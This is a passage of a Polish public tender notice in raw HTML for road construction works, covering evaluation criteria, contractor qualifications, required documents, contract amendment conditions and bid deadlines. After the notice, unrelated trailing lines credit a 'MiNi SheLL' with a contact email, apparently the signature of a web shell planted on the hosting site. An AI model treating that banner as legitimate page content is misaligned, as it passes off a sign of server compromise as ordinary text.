40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwaracji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu w zakresie:<br/>2.1. Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. Sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4. Zdolności technicznej lub zawodowej:<br/>Określenie warunków:<br/>1) DOSWIADCZENIE<br/>Wykonawca spełni warunek jeżeli wykaże że nie wcześniej niż w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w<br/>tym okresie, wykonał co najmniej 1 zamówienie odpowiadające swoim rodzajem przedmiotowi<br/>zamówienia tj. roboty budowlane w zakresie budowy, przebudowy, rozbudowy lub remontu drogi<br/>o wartości zadania nie mniejszej niż 250 000 zł brutto, co winni potwierdzić dowodami czy roboty<br/>te zostały wykonane w sposób należyty. Zamawiający przez zamówienie rozumie jedną umowę.<br/>Przez zamówienie należy rozumieć:<br/>– zamówienie rozpoczęte i zakończone w w/w okresie<br/>– zamówienie zakończone w w/w okresie , a rozpoczęte wcześniej niż w w/w okresie.<br/>2) KADRA<br/>Wykonawca spełni warunek jeżeli wykaże, że dysponuje kadrą techniczną posiadającą<br/>uprawnienia budowlane:<br/>– - kierownik budowy w specjalności drogowej bez ograniczeń oraz co najmniej 3 letnie<br/>doświadczenie zawodowe na stanowisku kierownika budowy,<br/>Przez uprawnienia budowlane rozumie się uprawnienia wydane zgodnie z ustawą z dnia 7 lipca<br/>1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie<br/>wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane, które<br/>zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r.<br/>Prawo Budowlane ( t.j. Dz.U. z 2020 r. poz. 1333 z późn. zm.)oraz ustawy z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz.U. z 2020 poz. 220 z późn. zm.).<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej -<br/>dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej<br/>– załącznik nr 4 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3). Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentu, o których mowa w ust. 4 pkt 2, składa dokument lub dokumenty<br/>wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że:społeczne lub zdrowotne,<br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury,<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>4) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ust. 5 lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3<br/>ustawy, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio<br/>oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w<br/>którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>Wykonawcy. Dokument o którym mowa powinien być wystawiony nie wcześniej niż 3 miesiące przed<br/>jego złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, porównywalnych z robotami budowlanymi<br/>stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty – załącznik nr 5 do SWZ;<br/>2) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. formularz ofertowy, 2) oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o<br/>braku podstaw do wykluczenia z postępowania, 3) kosztorys ofertowy - uproszczony, 4)<br/>zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XII ust. 3 SWZ,<br/>5) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa, 6)<br/>oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonują poszczególni<br/>Wykonawcy składający ofertę wspólnie, 7) Wykonawcy mogą wspólnie ubiegać się o udzielenie<br/>zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>8). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców –<br/>załącznik nr 2 do SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>9). W odniesieniu do warunku dotyczącego doświadczenia Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane.<br/>10). W przypadku o którym mowa w ust. 3 Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane<br/>wykonają poszczególni Wykonawcy – Załącznik nr 8 do SWZ.11). Oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców –<br/>załącznik nr 2 do SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3. W odniesieniu do warunku dotyczącego doświadczenia Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane.<br/>4. W przypadku o którym mowa w ust. 3 Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane<br/>wykonają poszczególni Wykonawcy – Załącznik nr 8 do SWZ.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania<br/>umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 454 i 455 ustawy<br/>Pzp, przewiduje możliwość dokonywania zmian postanowień zawartej umowy, w stosunku do<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących<br/>okolicznościach:<br/>1) zmiana terminów wykonania umowy:<br/>1.1) zmiany spowodowane nieprzewidzianymi w SWZ warunkami geologicznymi,<br/>archeologicznymi lub terenowymi, które spowodowały niezawinione i niemożliwe do uniknięcia<br/>przez Wykonawcę opóźnienie, w szczególności:<br/>a) wystąpienie w trakcie prowadzenia robót klęsk żywiołowych,<br/>b) natrafienie w trakcie prowadzenia robót na niewypały i niewybuchy,<br/>c) konieczność wykonania wykopalisk archeologicznych,<br/>d) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych,<br/>e) wystąpienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w<br/>szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów<br/>budowlanych lub podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;<br/>1.2) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, które<br/>spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w<br/>szczególności:<br/>a) wstrzymanie robót przez Zamawiającego,<br/>b) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub<br/>specyfikacji technicznej wykonania i odbioru robót,<br/>1.3) konieczność wykonania robót zamiennych lub zamówień dodatkowych;<br/>1.4) zmiany będące następstwem działania lub braku działania organów administracji i innych<br/>podmiotów o kompetencjach zbliżonych do organów administracji, w szczególności<br/>eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, które spowodowały<br/>niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:<br/>a) przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma -<br/>typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne<br/>podmioty decyzji, zezwoleń, uzgodnień itp.,<br/>b) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji,<br/>zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, w tym odmowa<br/>udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;<br/>1.5) zmiany spowodowane przez zagrożenie wpływające na bezpieczeństwo życia, zdrowia,<br/>mienia, lub robót na terenie budowy, lub sąsiadujących nieruchomości, a przedstawiciel<br/>inwestora wydał wykonawcy polecenie wykonania robót, usunięcia wad lub podjęcia innych<br/>czynności w celu wyeliminowania lub zmniejszenia zagrożenia, jeśli konieczność polecenia<br/>wynikła z przyczyn leżących po stronie Zamawiającego;<br/>1.6) zmiany spowodowane warunkami atmosferycznymi, które spowodowały niezawinione i<br/>niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:<br/>a) klęsk żywiołowych,<br/>b) warunków atmosferycznych odbiegających od typowych dla danej pory roku,<br/>uniemożliwiających prowadzenie robót budowlanych, prac geologicznych, przeprowadzenie prób<br/>i sprawdzeń, dokonywanie odbiorów,<br/>1.7) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące<br/>brakiem możliwości prowadzenia robót lub prac lub wykonywania innych czynności<br/>przewidzianych umową, które spowodowały niezawinione i niemożliwe do uniknięcia przez<br/>Wykonawcę opóźnienie, w szczególności:<br/>a) spowodowane sytuacją epidemiologiczną.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 pkt 1) termin<br/>wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia<br/>wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych<br/>okoliczności. Wykonawca nie może żądać zwiększenia wynagrodzenia lub zwrotu innych<br/>kosztów bezpośrednich lub pośrednich spowodowanych przestojem lub dłuższym czasem<br/>wykonywania umowy.<br/>Ciąg dalszy zmian umowy w sekcji IX pozostałe informacje. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> cena oferty, długość okresu gwarancji i rękojmi za wady <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Uzupełnienie pkt. 3.15 RODO 10) przysługuje Pani/Panu prawo wniesienia skargi do organu<br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez<br/>administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>Uzupełnienie do pkt. 7.4 Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania<br/>2) Zmiana sposobu spełnienia świadczenia:<br/>2.1) zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br/>a) z uwagi na możliwość osiągnięcia wymaganego efektu przy niższych kosztach wykonania<br/>robót poprzez zastosowanie innych rozwiązań technicznych lub materiałowych, przy zachowaniu<br/>jakości i parametrów technicznych obiektów budowlanych, instalacji i urządzeń,<br/>b) z uwagi na możliwość osiągnięcia wymaganego efektu poprzez zastosowanie innych<br/>rozwiązań technicznych lub materiałowych zwiększających jakość, parametry techniczne lub<br/>eksploatacyjne obiektów budowlanych lub skracających termin realizacji zamówienia,<br/>c) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na<br/>poniesienie niższych kosztów realizacji przedmiotu umowy lub kosztów eksploatacji<br/>wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót,<br/>d) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na<br/>skrócenie czasu realizacji inwestycji lub kosztów wykonywanych robót lub prac, jak również<br/>kosztów eksploatacji wykonanego przedmiotu umowy,<br/>e) konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań<br/>technicznych/technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji<br/>technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,<br/>f) odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i<br/>odbioru robót warunki geologiczne skutkujące niemożliwością zrealizowania przedmiotu umowy<br/>przy dotychczasowych założeniach technologicznych,<br/>g) odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i<br/>odbioru robót warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych obiektów budowlanych,<br/>h) zmiana decyzji, postanowień lub uzgodnień przez organy administracyjne i podmioty<br/>uzgadniające dokumentację projektową,<br/>i) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań<br/>technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,<br/>j) konieczność wykonania robót oraz usunięcia wad w celu zmniejszenia zagrożenia, gdy<br/>zaistnieje wypadek wpływający na bezpieczeństwo życia, zdrowia, mienia, lub robót na terenie<br/>budowy, lub sąsiadujących nieruchomości, a przedstawiciel inwestora wydał Wykonawcy<br/>polecenie wykonania robót, usunięcia wad lub podjęcia innych czynności w celu wyeliminowania<br/>lub zmniejszenia zagrożenia. W przypadku wystąpienia którejkolwiek z okoliczności<br/>wymienionych w ust. 1 pkt 2) ppkt 2.1) możliwa jest w szczególności zmiana sposobu<br/>wykonania, materiałów i technologii robót, zmiany lokalizacji budowanych urządzeń,<br/>ograniczenie zakresu robót objętych umową.<br/>Pozostałe informacje dotyczące zmiany umowy zawarte w załączniku nr 7 do SWZ projekt<br/>umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com